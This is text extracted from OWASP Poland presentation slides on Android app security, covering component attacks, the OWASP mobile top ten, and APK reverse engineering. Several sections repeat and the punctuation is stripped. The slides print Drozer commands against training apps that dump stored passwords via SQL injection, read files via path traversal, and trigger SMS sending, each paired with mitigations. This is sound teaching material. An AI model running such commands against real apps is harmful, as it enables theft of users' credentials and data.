bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Architecture
Linux Kernelbull The architecture is based on the Linux ( started from 26)
kernel bull This layer is core of android architecture It provides
service like power management memory management security etc
bull It helps in software or hardware binding for better communication
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
